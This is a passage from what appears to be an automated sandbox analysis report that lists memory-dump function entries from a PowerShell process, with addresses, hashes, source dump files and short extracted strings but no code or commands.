                    • String ID: 4'q$4'q$4'q$4'q$4'q$tLk$tLk$tLk$tLk$x.k$x.k$x.k$-k$-k
                    • API String ID: 0-3494729185
                    • Opcode ID: 3d219b1de2da3994939e18cecc011342ce964b830f0b79ac272b02f2b59a8b81
                    • Instruction ID: 354d7bbbbcf7093a5c79b3bef4395d5c6f7de42444d55c0f726ebef73509325a
                    • Opcode Fuzzy Hash: 3d219b1de2da3994939e18cecc011342ce964b830f0b79ac272b02f2b59a8b81
                    • Instruction Fuzzy Hash: 77F27DB4B00319DFDB24DB65C994BDAB7B2AF89304F1084A9D50AAB741CB71EE81CF51
                    Function 035DF000 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 615d13d5bb50c1fdb3fb2e1db9657d5d1d247097c876c958d38547242489ec85
                    • Instruction ID: c7d1a0947aed13f243eabb0a13bd0d6f3b815bc1bddc660505f2fafb1d06e858
                    • Opcode Fuzzy Hash: 615d13d5bb50c1fdb3fb2e1db9657d5d1d247097c876c958d38547242489ec85
                    • Instruction Fuzzy Hash: 69B16271E00249DFDB24CFADE88579DBBF2BF88304F188529D416A7264EB749845CB91
                    Function 035DF8D0 Relevance: .3, Instructions: 266COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5fdbcdb6ce696989db9a327773fd67a054725fca8042bc320aeaa799f7e74ba7
                    • Instruction ID: ca7497d413808614743495de7aa32b5d175d5fb6c730d92812babe6bfc9f1265
                    • Opcode Fuzzy Hash: 5fdbcdb6ce696989db9a327773fd67a054725fca8042bc320aeaa799f7e74ba7
                    • Instruction Fuzzy Hash: FCB15371E00209DFDB24CFADE89179DBBF2BF48714F188529D816E7264EB749845CB81
                    Function 07C6B458 Relevance: 27.2, Strings: 21, Instructions: 921COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tLk$tPq$tPq$x.k$$q$$q$$q$$q$$q$$q$-k
                    • API String ID: 0-1185623502
                    • Opcode ID: 4b815c21d2be1911ba43ffda440814eb6605f0671db6543c4619063dcd099a36
                    • Instruction ID: 5cb721e6144f1773590b35d693161e83cfe0cd5d0e8c80cb68d6bb8f7ef8e8b5
                    • Opcode Fuzzy Hash: 4b815c21d2be1911ba43ffda440814eb6605f0671db6543c4619063dcd099a36
                    • Instruction Fuzzy Hash: 7E72A2B0A002199FDB24DF65C9D4BEAB7B2AF85314F2480A9D5099F351DB31EE41CBA1
                    Function 07C64200 Relevance: 18.4, Strings: 14, Instructions: 922COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                    • API String ID: 0-3794447617
                    • Opcode ID: 099fd2a1664f5b79f2cd6c83564bb6409cb0d1da35ad30ad92081ba28731618a
                    • Instruction ID: ecc2cb5c5a88710e590856d8de4a6d928b533585a4bcd2cbdd98de1db46a577f
                    • Opcode Fuzzy Hash: 099fd2a1664f5b79f2cd6c83564bb6409cb0d1da35ad30ad92081ba28731618a
                    • Instruction Fuzzy Hash: 8B829DB4B00205DFD714CB94C5D5BAABBF2AF86308F208169D905AF755CB72EE42CB91
                    Function 07C6CE79 Relevance: 12.3, Strings: 9, Instructions: 1096COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$tLk$tLk$x.k$x.k$-k$-k
                    • API String ID: 0-972504629
                    • Opcode ID: b37f035fc5c1d413fac9f67686f2c9028bd2b9d7c73b23c5901b0c006e43fe0c
                    • Instruction ID: 6069fa8330be430b9a2f908658ed5729455221fff7ae41f40e45bf0be1075d61
                    • Opcode Fuzzy Hash: b37f035fc5c1d413fac9f67686f2c9028bd2b9d7c73b23c5901b0c006e43fe0c
                    • Instruction Fuzzy Hash: 1CB270B4B003199FDB24DF64C994BDAB7B2AF89304F1085A9D50AAB741CB71ED82CF51
                    Function 07C6B8D8 Relevance: 10.5, Strings: 8, Instructions: 516COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$tLk$x.k$$q$$q$-k
                    • API String ID: 0-3238634893
                    • Opcode ID: b3defbc801fc741ce5ef0b2b6b3c90b3314b8c7cdd926293e54434288d9aa3a0
                    • Instruction ID: 2a3188b8a443b4b9d58050ad262bc98769403d0d6180df8693a0c278d6cdab99
                    • Opcode Fuzzy Hash: b3defbc801fc741ce5ef0b2b6b3c90b3314b8c7cdd926293e54434288d9aa3a0
                    • Instruction Fuzzy Hash: 99227CB4A00319DFDB24CF15C984BEAB7B2AF89304F2085A9D509AB355DB71EE81CF51
                    Function 07C641E7 Relevance: 9.5, Strings: 7, Instructions: 728COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q
                    • API String ID: 0-3874413649
                    • Opcode ID: 545103af348465a2aa7112c037004f655c228671fb50bacb73eafeb0cd9433ba
                    • Instruction ID: e2c1a10eaaa9186cd0557a2c8bbeb3478382bca375b5f004086ef1354778bec1
                    • Opcode Fuzzy Hash: 545103af348465a2aa7112c037004f655c228671fb50bacb73eafeb0cd9433ba
                    • Instruction Fuzzy Hash: 08628BB4B00244DFD704CB94C5C5BA9BBB2EF86318F248169D905AF795CB72EE42CB91
                    Function 07C65328 Relevance: 7.9, Strings: 6, Instructions: 373COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$4'q$4'q$x.k$-k
                    • API String ID: 0-3499190445
                    • Opcode ID: 8224840900f726e7c7ef880f8065d1083c65113e4932dc5292e557066685337e
                    • Instruction ID: c46b48d4cc810a4c5b5588f67c27a57854dc12053608f423a2725f8b03b61ca1
                    • Opcode Fuzzy Hash: 8224840900f726e7c7ef880f8065d1083c65113e4932dc5292e557066685337e
                    • Instruction Fuzzy Hash: 21E1ACB4E002099FDB14CB69D5C9BAEB7B2AF89304F25C069D4016F795CB72EC42CB91
                    Function 07C60778 Relevance: 6.5, Strings: 5, Instructions: 235COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q$$q
                    • API String ID: 0-170447905
                    • Opcode ID: 9b4b95e142f674f4e4afaba46f38f0f443d83f69618c7c314c6b26018e23c7d0
                    • Instruction ID: 1b1648ab920481ca9a1ab2257cbf7c72e74b5f2bad4f44f4b954e4ccc8b5361a
                    • Opcode Fuzzy Hash: 9b4b95e142f674f4e4afaba46f38f0f443d83f69618c7c314c6b26018e23c7d0
                    • Instruction Fuzzy Hash: D3710AB1B002169FDB249B7984C57BAB7E2EFC5614F18807AC945EF241EB31C981CBE1
                    Function 07C620A8 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$$q$$q$$q
                    • API String ID: 0-170447905
                    • Opcode ID: fc0172c38fcade5d6673150d54bbbdb6e211db508a9ae2d03c15aa0372c2d9ed
                    • Instruction ID: ab96da4ad6b08fdc290f83d87039117147ef5e3fea6028fa5ba2a8c3f9f77b7d
                    • Opcode Fuzzy Hash: fc0172c38fcade5d6673150d54bbbdb6e211db508a9ae2d03c15aa0372c2d9ed
                    • Instruction Fuzzy Hash: FC41E6F6708207DFDB254A268CD92B577E2BF82220B2C80BBD9559F251DA35CE41C761
                    Function 07C63CD8 Relevance: 5.8, Strings: 4, Instructions: 804COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$tLk$x.k$-k
                    • API String ID: 0-916354516
                    • Opcode ID: 6d65f8e07535c9320052595863898410a4d319dae102ff36755379aa354a4602
                    • Instruction ID: b848714dbc2ff80f8ad5b20789401772f0d176641d78e4b13781088af316e1ed
                    • Opcode Fuzzy Hash: 6d65f8e07535c9320052595863898410a4d319dae102ff36755379aa354a4602
                    • Instruction Fuzzy Hash: BF7283B4A00315DFE724DB65C9D4BAAB7B2AF85304F1085AED90A6B741CB31EE41CF61
                    Function 07C6329F Relevance: 5.7, Strings: 4, Instructions: 660COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$x.k$-k
                    • API String ID: 0-3832083339
                    • Opcode ID: cbf51e0ee1ffcf85e2e06b241feb8d1c0e4346fb9a36d7a2f9fad9aebe5fcbb5
                    • Instruction ID: e03b82823ab543267813ae8a1e1d4cd32184380969eb7b998db96468e83ee534
                    • Opcode Fuzzy Hash: cbf51e0ee1ffcf85e2e06b241feb8d1c0e4346fb9a36d7a2f9fad9aebe5fcbb5
                    • Instruction Fuzzy Hash: D95294B4A003159FE724DB55C9D4BAAB7B2AF85304F1085ADD90A6F741CB31ED42CF61
                    Function 07C65327 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$x.k$-k
                    • API String ID: 0-3832083339
                    • Opcode ID: df490b4220b77ade612930bc75f9e59be463b0a6eb2c1fa85468bdd855d5482d
                    • Instruction ID: f062799ecb084743f7f0faab5a741fedee351b5638baf84b9521a0cef2df5c29
                    • Opcode Fuzzy Hash: df490b4220b77ade612930bc75f9e59be463b0a6eb2c1fa85468bdd855d5482d
                    • Instruction Fuzzy Hash: 6DB1BDB4A002059FDB14CF69D6C8BAEBBB2AF89304F25C169D4016F755CB71ED42CB91
                    Function 07C6530A Relevance: 5.3, Strings: 4, Instructions: 276COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$4'q$x.k$-k
                    • API String ID: 0-3832083339
                    • Opcode ID: 16924604026f48954f7fded4a7e2fb77a6b344187a5b4cb3e5601554c2f3166a
                    • Instruction ID: e5053b81f6ca09a502a3dca73b771cdbb7f4b4349d729811325d4d55248d88f3
                    • Opcode Fuzzy Hash: 16924604026f48954f7fded4a7e2fb77a6b344187a5b4cb3e5601554c2f3166a
                    • Instruction Fuzzy Hash: EEB1BAF4A002059FDB10CB65D6C9BAEBBB2AF89304F25C069E4016F755CB72ED42CB91
                    Function 07C63E93 Relevance: 4.3, Strings: 3, Instructions: 560COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$x.k$-k
                    • API String ID: 0-196464176
                    • Opcode ID: 39be5c66832332f09ac768988dcbc9939482eb2b34f729f732824e20fd1aed3f
                    • Instruction ID: 13b16e009a19da4a6477cd3826a1519c8191149efd2bd1cf85a8a34a37e2da5e
                    • Opcode Fuzzy Hash: 39be5c66832332f09ac768988dcbc9939482eb2b34f729f732824e20fd1aed3f
                    • Instruction Fuzzy Hash: 433293B4A00315DFE724DB54C9D4BAAB7B2AF85304F5085AED90A6B741CB31ED81CF61
                    Function 07C6D046 Relevance: 4.3, Strings: 3, Instructions: 536COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$x.k$-k
                    • API String ID: 0-196464176
                    • Opcode ID: edd9a7c15482740122a8de6544813586364858bce83f57dc4551e901ff50ad61
                    • Instruction ID: 4b1ad5ffb13ccf1b6bd7c7176e2d12d01b57838e6035d40217781f67fe5fc39a
                    • Opcode Fuzzy Hash: edd9a7c15482740122a8de6544813586364858bce83f57dc4551e901ff50ad61
                    • Instruction Fuzzy Hash: 11329FB4B00319DFDB24DB64C994BDAB7B2AF89304F1085A9D90A6B741CB71ED82CF51
                    Function 035DB508 Relevance: 4.3, Strings: 3, Instructions: 523COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Hq$$q$$q
                    • API String ID: 0-405414136
                    • Opcode ID: 37b9796c427f279f7b791110966cee810a75a0e786fdef0b7daad0892b80cb29
                    • Instruction ID: 4cd3db5a3cfb0d9cbeeb10e360a0f0bd27d0660feaa22c82fdcea5b41660fb9a
                    • Opcode Fuzzy Hash: 37b9796c427f279f7b791110966cee810a75a0e786fdef0b7daad0892b80cb29
                    • Instruction Fuzzy Hash: A5226E34B002148FCB25EB39D854AAEB7B2BF89304F1544E9D50AAB365DB35DE85CF81
                    Function 07C6D2D8 Relevance: 4.2, Strings: 3, Instructions: 435COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$tLk$x.k
                    • API String ID: 0-998424798
                    • Opcode ID: d53d65a2d6519043ef8b453a4a846f38234c0dc94a8ff608e47c2e2c8b9c8291
                    • Instruction ID: 226f3ae884c980cbb12a54f13d482c031381c5e6858d0abfa24cbd17859df490
                    • Opcode Fuzzy Hash: d53d65a2d6519043ef8b453a4a846f38234c0dc94a8ff608e47c2e2c8b9c8291
                    • Instruction Fuzzy Hash: 1B1239B4B04315CFEB20DB15C9D4BA9B7B2AB86304F1085E9D50AAB751DB71EE81CF11
                    Function 07C6D0CD Relevance: 4.2, Strings: 3, Instructions: 431COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$tLk$x.k
                    • API String ID: 0-998424798
                    • Opcode ID: 06c321bfc56a25ef7e16471b038577b335fb9cdfca82a8d32abd08a2a1767263
                    • Instruction ID: ae1dea2de3bb15e6135c84536b910a1573fa307299c0f821e09add2ab2fa3fae
                    • Opcode Fuzzy Hash: 06c321bfc56a25ef7e16471b038577b335fb9cdfca82a8d32abd08a2a1767263
                    • Instruction Fuzzy Hash: 471228B4B04219CFEB60DB15C9C8BA9B7B2AB46304F1085E9D50AAB751CB71EE81CF11
                    Function 07C620E8 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'q$$q$$q
                    • API String ID: 0-3789935075
                    • Opcode ID: 9cb834c95e7fa18d4b05ae7f7bb622209751c4499f76679f28f8f146623da785
                    • Instruction ID: 948262222e3851dbac81912afabba4084ffb30765882ad3583c640832767b6e1
                    • Opcode Fuzzy Hash: 9cb834c95e7fa18d4b05ae7f7bb622209751c4499f76679f28f8f146623da785
                    • Instruction Fuzzy Hash: 903129F5608207DFDB294A15CDCC2B6B7A2BF82220F2C8166DE105E191D734CA91C721
                    Function 07C61040 Relevance: 3.1, Strings: 2, Instructions: 557COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tPq$tPq
                    • API String ID: 0-4270251778
                    • Opcode ID: 6d34ba434c82a446cc5c0fc823923533a000825c179701949b2a566b45fa376c
                    • Instruction ID: c2db46bef9146ba1061359f5dbb3ec55abc1096d195c27ee8b4f223978345710
                    • Opcode Fuzzy Hash: 6d34ba434c82a446cc5c0fc823923533a000825c179701949b2a566b45fa376c
                    • Instruction Fuzzy Hash: E522D5B0B002099FDB14CB59C5C5BAABBF2AF86315F28C06AD5059F751CB72ED42CB91
                    Function 07C60A80 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tPq$tPq
                    • API String ID: 0-4270251778
                    • Opcode ID: 6b91f557696ca098759be658ec902fc16c43bf80ed5c8d78a62d08beb8b12704
                    • Instruction ID: 6a4e1fe6e1b4a29eb1f83913d27fe63f98103c6b4d5f1a450f3f6881b1f450a8
                    • Opcode Fuzzy Hash: 6b91f557696ca098759be658ec902fc16c43bf80ed5c8d78a62d08beb8b12704
                    • Instruction Fuzzy Hash: AB416D71B003059FDB248B65D8C9FAAB7A2EFC5304F18C06BD545AF291DA71C981C7A1
                    Function 07C657C8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1609074683.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7c60000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.k
                    • API String ID: 0-3814145804
                    • Opcode ID: f12b27c0327dce655102a10d1a5d6e671c4e708b93919e3426e40bc357e5344f
                    • Instruction ID: 7eac7f1fa9ca248c1b601d5c29fe3d6cb484f693cdc3ae933ef5d6fba9699fc6
                    • Opcode Fuzzy Hash: f12b27c0327dce655102a10d1a5d6e671c4e708b93919e3426e40bc357e5344f
                    • Instruction Fuzzy Hash: 6E31CEB4B00208AFE7149B64CA95BAF77B3ABC5354F208025E9016F791CF76DC428BA1
                    Function 08CB7C20 Relevance: .5, Instructions: 464COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1611417440.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_8cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 154171a5a3dfaf53f1d7ea73daf8ff012b6e73ead396dd6bf1761ea0c9c2146c
                    • Instruction ID: 0cd9f67bca465eaa5dabb669e0c9198b3932262944f1f479838c119ac52a759e
                    • Opcode Fuzzy Hash: 154171a5a3dfaf53f1d7ea73daf8ff012b6e73ead396dd6bf1761ea0c9c2146c
                    • Instruction Fuzzy Hash: 01126034A01649DFDB15CFA8C880ADDBBB2FF89314F258159E845AB365C735ED42CB90
                    Function 08CB6608 Relevance: .4, Instructions: 433COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1611417440.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_8cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b576468e78d95cce504731e8f75f43a8bd34ef22fde22294710606103197d5f1
                    • Instruction ID: 79f37cc3513d54144de81d781abd820c48bebc9c365d6538fa0f00c3c3484eec
                    • Opcode Fuzzy Hash: b576468e78d95cce504731e8f75f43a8bd34ef22fde22294710606103197d5f1
                    • Instruction Fuzzy Hash: 98020A74A00619DFDB15CFA8D884ADEBBB2FF88311F248159E805AB355D735ED82CB90
                    Function 08CB6BC8 Relevance: .4, Instructions: 431COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1611417440.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_8cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80bd93a4db88012860871fbec574312fca1b471de31765e61c637831acf77b53
                    • Instruction ID: 2bd92f2e86d80c80aca7884d23e8ba754e7462f15fcd37f1952d2dc859d6bec5
                    • Opcode Fuzzy Hash: 80bd93a4db88012860871fbec574312fca1b471de31765e61c637831acf77b53
                    • Instruction Fuzzy Hash: 6F024C34A006599FDB15CFA8D880AEEBBF2FF89314F258159E845AB361C735DD42CB90
                    Function 08CB75A0 Relevance: .4, Instructions: 393COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1611417440.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_8cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c63d21d433c286ab0561fc9a965b4fa6a3c2c39ac84130ab1d0a0585117428d1
                    • Instruction ID: 9562b39449df55727bd4183253ca6c858dec609be31a3d2716c83c6213ffd485
                    • Opcode Fuzzy Hash: c63d21d433c286ab0561fc9a965b4fa6a3c2c39ac84130ab1d0a0585117428d1
                    • Instruction Fuzzy Hash: E2F10B34A01619DFDB15CF98C884AEDBBB2FF88314F258159E805AB365C735ED82CB90
                    Function 035DA9E0 Relevance: .4, Instructions: 359COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c02cb9f1aeb816abd14d66a65bd2e99e025cb2fe7d19ab0b0322ae46406ae587
                    • Instruction ID: 7eb3159414777be22bee10f37d4f53a7f3aec0b4c2c1b6577bce5eebc52b0e3c
                    • Opcode Fuzzy Hash: c02cb9f1aeb816abd14d66a65bd2e99e025cb2fe7d19ab0b0322ae46406ae587
                    • Instruction Fuzzy Hash: DDE12A74A012499FDB25CF98D484A9EFBB2FF48310F298159E805AB365C735ED82CB90
                    Function 035D95A8 Relevance: .3, Instructions: 325COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a85074fc08c637f72a0717fd2bfc6319eb4c28a543da87a0784be376c531c49
                    • Instruction ID: 61dfd9a869b979fb2ee7ecfcf46098e5fdc75b2b645d3d0f2e5b07883324282f
                    • Opcode Fuzzy Hash: 7a85074fc08c637f72a0717fd2bfc6319eb4c28a543da87a0784be376c531c49
                    • Instruction Fuzzy Hash: CBD12A74E012499FDB15CFA8E484A9DFBF2BF49314F288195E815AB365C730ED42CB90
                    Function 035D72A0 Relevance: .3, Instructions: 313COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a10e538fe0e80754c1d94436aa3f3be2f53b4d35cac32061706a1e78f074764f
                    • Instruction ID: 9bf70cc4a1a896a11ba4d7c49c38d47763b5143222abb18ed7c55069959b851f
                    • Opcode Fuzzy Hash: a10e538fe0e80754c1d94436aa3f3be2f53b4d35cac32061706a1e78f074764f
                    • Instruction Fuzzy Hash: 4DC18F35A00209DFCB24DFA9D544A9DBBB6FF88310F158569E406AF364DB74ED49CB80
                    Function 035DEFF4 Relevance: .3, Instructions: 297COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1e3a9c6875217275db7a10f2adcc64eb70ff259053441558b0c72abf6bb3d08
                    • Instruction ID: d4a40fef7bca64489d8ceedd175844500eb6b1adf5da74105362b6d73d7eeb90
                    • Opcode Fuzzy Hash: e1e3a9c6875217275db7a10f2adcc64eb70ff259053441558b0c72abf6bb3d08
                    • Instruction Fuzzy Hash: EFC16171E00249DFDF20CFACE8457ADBBF1BF48314F188129D416AB2A4EB749885CB91
                    Function 035DF8C5 Relevance: .3, Instructions: 265COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1602026572.00000000035D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_35d0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 313541c2675fec87334df41dbe0990c7db2632adeabecd1348059cf859c829a9
